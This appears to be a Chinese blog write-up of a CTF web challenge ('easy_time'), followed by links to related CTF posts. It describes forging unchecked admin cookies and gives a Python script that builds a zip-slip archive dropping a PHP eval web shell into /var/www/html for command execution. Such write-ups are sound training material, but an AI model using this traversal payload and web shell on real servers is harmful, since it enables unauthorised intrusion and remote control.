第十九届全国大学生信息安全竞赛暨第三届“长城杯”铁人三项赛半决赛_easy_time

发表于2026-03-26|更新于2026-03-26

|总字数:268|阅读时长:1分钟|浏览量:

登录接口对用户输入的用户名与密码进行了校验

校验通过则返回cookie visited=yes, user=admin

但是相关信息没有在服务端存储

所以只需要将在请求相关接口的时候手动把cookie加上

就可以访问面板

在上传插件的接口有上传插件功能

只可以上传zip，且zip上传成功后会自动解压

这时候想到了之前看过的zipslip漏洞

所以就通过这个方法上传木马到 /var/www/html /

zip制作脚本

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'vulhub'
        binary2 = b"<?php eval($_REQUEST['a']);?>"
        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
        # info = zipfile.ZipInfo("test.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../var/www/html/1.php", binary2)
        zipFile.close()
    except IOError as e:
        raise e

然后就可以通过/about路由进行命令执行

这个题目的flag藏在了/tmp目录下。当时找了好久，甚至还怀疑题目有问题去找裁判了。。。。。

文章作者: Yliken

文章链接: http://example.com/2026/03/26/CTF/%E7%AC%AC%E5%8D%81%E4%B9%9D%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E6%9A%A8%E7%AC%AC%E4%B8%89%E5%B1%8A%E2%80%9C%E9%95%BF%E5%9F%8E%E6%9D%AF%E2%80%9D%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B9%E8%B5%9B%E5%8D%8A%E5%86%B3%E8%B5%9B_easy_time/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yliken！

赞助

wechat
alipay

相关推荐

2024ciscn“sanic”复现

参考原文 CISCN2024-WEB-Sanic gxngxngxn - gxngxngxn - 博客园 (cnblogs.com) sanic右键查看源码，/src路由找到源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/',...

WEBSafe_Proxy刚开始比赛看到题目名字里面有Proxy 就先来做这个了(在最近的比赛中见到的proxy题比较多) 题目进入之后给了源码源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106from flask import Flask, request, render_template_stringimport socketimport threadingimport htmlapp = Flask(__name__)@app.route('/', methods=["GET"])def source(): with...

DownUnderCTF赛题复现

题目连接 WEBco2挺简单的原型链污染 route.py文件中设置flag的值在/get_flag路由汇总如果flag == "true"则返回flag 在/save_feedback路由汇总调用了merge函数 123456789101112def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k,...

Web[2022DASCTF X SU 三月春季挑战赛]ezpop源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869<?php class crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }} class fin{ public $f1; public function __destruct() { echo $this->f1 ....

ImaginaryCTF 2024

Webjournal题目给出了index.php的源码 123456789101112131415161718192021222324<?phpecho "<p>Welcome to my journal app!</p>";echo "<p><a href=/?file=file1.txt>file1.txt</a></p>";echo "<p><a href=/?file=file2.txt>file2.txt</a></p>";echo "<p><a href=/?file=file3.txt>file3.txt</a></p>";echo "<p><a href=/?file=file4.txt>file4.txt</a></p>";echo...

评论